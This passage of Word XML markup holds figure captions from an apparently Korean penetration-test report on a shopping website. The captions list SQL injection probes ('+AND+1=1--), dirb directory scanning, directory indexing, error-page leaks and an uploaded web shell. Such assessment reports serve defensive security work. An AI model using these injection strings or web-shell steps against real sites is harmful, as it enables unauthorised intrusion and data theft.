          <w:instrText xml:space="preserve"> PAGEREF _Toc209094581 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="738FA878" w14:textId="0CAD2CDB" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094582" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 9. 서버 관리 페이지에 “ls”를 실행한 결과 출력</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094582 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="693F031F" w14:textId="5CBAD419" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094583" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 10. Burp Suite -&gt; Intercept on 후, 쿠폰 페이지에서 검색어 입력</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094583 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3167AA55" w14:textId="507A55B7" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094584" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 11. 참 조건 검증('+AND+1=1--)</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094584 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="70FE5232" w14:textId="606D7521" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094585" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 12. 거짓 조건 검증('+AND+1=2--)</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094585 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="67A447C4" w14:textId="688119C2" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094586" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 13. 쿠폰 번호 검색창에 DB유저 확인 쿼리 입력</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094586 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="246210EF" w14:textId="375E0464" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094587" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 14. dirb 도구를 이용해 폴더 탐색</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094587 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6130556C" w14:textId="716EBFAC" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094588" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 15. /ckeditor/ 디렉터리 인덱싱 취약점 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094588 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1649FDB5" w14:textId="0D085D27" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094589" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 16. /css/ 디렉터리 인덱싱 취약점 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094589 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F96CAB1" w14:textId="7FDA4BC9" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094590" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 17. 메인에서 상품 클릭</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094590 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="46EABC25" w14:textId="62739323" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094591" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 18. 상품 설명 하단 “상품평”에서 “WRITE” 클릭</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094591 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3640BB19" w14:textId="70D1967E" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094592" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 19. 긴 리뷰 작성 후 “작성하기” 클릭</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094592 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6C5677E2" w14:textId="694C24A7" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094593" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 20. 에러 페이지 내 중요정보 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094593 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C421615" w14:textId="5C4D0E09" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094594" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 21. “고객센터” 내 “QNA” 페이지</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094594 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E55FC92" w14:textId="5B398AF8" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094595" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 22. 게시판에 작성된 악성 콘텐츠 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094595 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="63C737D1" w14:textId="7ADCE7FC" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094596" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 23. 업로드된 웹쉘 파일 및 경로 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094596 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>28</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6CB53167" w14:textId="693E9376" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094597" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 24. 업로드된 웹쉘 파일 작동 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094597 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>28</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E352C82" w14:textId="03D7ADBA" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094598" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 25. 메인에서 검색창 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094598 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
